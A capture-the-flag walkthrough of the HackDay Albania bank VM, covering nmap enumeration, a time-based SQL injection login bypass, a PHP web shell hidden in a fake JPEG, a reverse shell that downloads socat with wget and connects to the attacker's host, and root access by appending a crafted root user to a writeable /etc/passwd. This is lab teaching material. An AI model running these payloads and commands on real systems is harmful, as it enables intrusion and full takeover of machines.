CTF: HackDay Albania Bank Walkthrough

This CTF challenge is fun and provides a lot of opportunities to work with SQL injection, writeable file abuse and is actually not that difficult but provides a lot of opportunity to practice skill sets. I really enjoyed this one.

Tools & Techniques

  • nmap, dirb
  • Burp Suite
  • SQLMap
  • Reverse Shell
  • Exploiting a writeable file

Enumeration

sudo arp-scan -l

nmap 192.168.0.42

sudo nmap -sV -p- -AO 192.168.0.42
(nmap scan)

Discovering the Banking Website

I would highly recommend you check out mrb3n’s walkthrough. Ben gets it right. He writes a script that iterates through the directories trying to find the correct folder. You can improve your ack and cut skills.

Ultimately, I just went down the list copying and pasting the folders into the browser to see what came up.

(robots.txt)

SQL Injection

After running dirb and nikto with little useful results my gut told me this would be a SQL injection vulnerability. I used SQLMap to identify some SQL Injection vulnerabilities. At first, I tried using the vulnerabilities with Burp Suite but that didn’t work. However, I was able to copy and paste the vulnerability into the login form and gain access to a user.

(SQLMap)

You can easily get access by pasting the found SQL injection vulnerability into the contact form field for the username and use a “#” for the password.

# username
' RLIKE SLEEP(1) --jUMp

# password
#

I also recommend reading about what reedphish did. The article demonstrates using wfuzz to find a user that could be brute-forced.

The cool thing about using Burp Suite I was able to see that SQL Injection cause a delay before the data loaded. Unfortunately, that’s all I saw.

(Burp Suite)

Uploading a Malicious Image

Once I had access to the login screen of the bank website there was a screen to upload a support ticket with an image. It’s not very clear about what you can or can’t upload so I tried uploading a text file and it gave me this error.

So… I created a malicious image. mal.jpg

GIF89;
<?php system($_GET['c']); ?>

Burp Suite

Before I got a reverse shell I tried to use Burp Suite to get the call home but it did not work. So, I pulled information out like the users and started running that information through hydra. This resulted in no credentials after 30 minutes of running.

(Burp Suite – /etc/passwd)

Reverse Shell

Using the pentest monkey’s PHP reverse shell I customized that and uploaded it to the help desk. This worked flawlessly.

(Configuring pen test monkey’s php reverse shell script)

To start the listener for the reverse shell I ran these commands:

sudo ufw allow 443
sudo nc -nvlp 443
(pen test monkey reverse shell established)

Getting PTTY

I tried using python but python 2 is not installed. For whatever reason I didn’t think about trying ptyhon 3 so I ended up trying a new method using a static binary like socat.

I read about this technique here: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

# in parrot os.. start a netcat listener
sudo ufw allow 4444
sudo nc -nvlp 4444
# in current reverse shell use socat to get a 2nd reverse shell with tty
cd /tmp/
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444

# if you loose the reverse shell you can get it back running this command
socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.37:4444

Privilege Escalation

Once I had a reverse shell and started snooping around I could see that there was one user on the box who had recently used a sudo command successfully. This turns out to be a possible rabbit hole.

LinEnum

I pulled LinEnum and executed that script from the /tmp folder and found a way up. It turns out that the /etc/passwd was write enabled. This means I could create a new user or put a password in place for taviso.

(/etc/passwd is writeable)

Creating a Root User

First, you’ll need to get a hashed password using openssl. Do this on your attack machine and base64 encode the string.

# in parrot os (I used "asdf" for the password)
openssl passwd -1

# generated password is
$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.

# final string for /etc/passwod... this needs to be base64 encrypted.
hax:$1$woQDlhpK$mKCdIm/.e69hq8wGeE7Fs.:0:0:hax:/root:/bin/bash

# use an online base 64 tool
aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g=

In the reverse shell you will need to execute this command to create a user in the /etc/passwd file.

# echo "hax" user into /etc/passwd
echo aGF4OiQxJHdvUURsaHBLJG1LQ2RJbS8uZTY5aHE4d0dlRTdGcy46MDowOmhheDovcm9vdDovYmluL2Jhc2g= | base64 -d >> /etc/passwd

# switch to that user
su hax
asdf

Root Flag